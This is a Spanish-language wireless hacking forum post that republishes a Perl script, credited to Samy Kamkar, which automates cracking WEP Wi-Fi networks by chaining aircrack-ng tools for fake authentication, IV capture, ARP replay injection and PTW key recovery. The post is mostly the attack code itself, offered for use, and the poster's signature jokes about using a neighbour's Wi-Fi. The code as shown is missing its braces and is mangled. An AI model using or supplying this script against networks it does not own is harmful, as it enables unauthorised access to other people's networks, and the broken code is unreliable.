16 de Octubre de 2017, 07:13:50 pm
  • WPSdb - Base de Datos de Pines Online

Autor Tema: AirSamy [Script]  (Leído 3098 veces)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.114
  • Reputación: +247/-3
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
AirSamy [Script]
« en: 21 de Junio de 2011, 11:45:01 am »
Cita de: Samy Kamkar
airsamy provides a simple interface to quickly and automatically crack a WEP network in minutes. It displays a list of available WEP networks and once selected, it automatically places your driver in monitor mode, tests packet injection, fake authenticates with the AP, captures IVs for cracking, captures ARP packets and replays them to introduce more IVs into the network, and cracks using the PTW attack.

airsamy proporciona una interfaz sencilla para acabar de forma rí¡pida y automí¡ticamente a una red WEP en cuestiín de minutos. Se muestra una lista de redes disponibles WEP y una vez seleccionado, se coloca automí¡ticamente el controlador en modo monitor, la inyecciín de paquetes de pruebas, falso autentica con el AP, IVs captura de grietas, captura los paquetes ARP y los reproduce para introducir mí¡s IVs en la red, y las grietas con el ataque PTW.

Código: [Seleccionar]

use strict;

my $interface = shift || "wlan0";

my $airmon = "airmon-ng";
my $aireplay = "aireplay-ng";
my $aircrack = "aircrack-ng";
my $airodump = "airodump-ng";

# stop + start interface
system($airmon, "start", $interface);

print "Please find an AP to use. When found, hit CTRL+C.\n";
print "[remember part of the name or part of BSSID]\n";

# tmpfile for ap output
my $tmpfile = "/tmp/airsamy" . rand();

# show user APs
eval {
local $SIG{INT} = sub { die };
open(DUMP, "$airodump --output-format csv -w $tmpfile $interface|") || die "Can't run airodump ($airodump): $!";

# read in APs
my %aps;
my ($tmpfile1) = glob("$tmpfile*");
open(APS, "<$tmpfile1") || die "Can't read tmp file $tmpfile1: $!";
while (<APS>)
s/\s+/ /g;
$aps{$_} = 1;

# ask for AP
my ($input, $ap);
while (!$ap)
my $found = 0;

print "\nPlease enter part of the name/bssid of the AP: ";
chomp($input = <STDIN>);
$input =~ s/://g;
print "\n";

foreach my $tmpap (keys %aps)
my @data = split(/\s*,\s+/, $tmpap);
if ($tmpap =~ /$input/i)
print "Found: $data[0] ($data[13]) ch=$data[3] mb=$data[4] enc=$data[5] $data[6] $data[7]";
if ($data[5] !~ /WEP/)
print " -- NOT WEP!";
$ap = $tmpap;
print "\n";

if ($found > 1)
$ap = undef;
print "\nPlease be more specific.\n\n";

# get ap info
my @data = split(/\s*,\s+/, $ap);
my ($bssid, $essid, $chan) = ($data[0], $data[13], $data[3]);

# start on channel
system($airmon, "start", $interface, $chan);

# test injection
system($aireplay, "-9", "-e", $essid, "-a", $bssid, $interface);

# fake auth with the AP
system($aireplay, "-1", "0", "-e", $essid, "-a", $bssid, $interface);

# fork off, capture IVs in front
if (fork())
# capture IVs
system($airodump, "-c", $chan, "--bssid", $bssid, "-w", $tmpfile, $interface);

# crack!
#system($aircrack, "-z", glob("$tmpfile*cap"));

# remove extra files

# do background stuff to produce packets

# crack until we find something
if (fork())
my ($key);
while (!$key)
open(CRACK, "$aircrack -z " . join(" ", glob("$tmpfile*cap")) . "|");
while (<CRACK>)
if (/correctly:\s*100%/)
$key = 1;

system("killall", "-9", $aireplay, $airodump);
system($aircrack, "-z", glob("$tmpfile*cap"));

# inject arps
# capture an ARP and replay
system($aireplay, "-3", "-b", $bssid, $interface);

SITIO: http://samy.pl/airsamy.pl
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD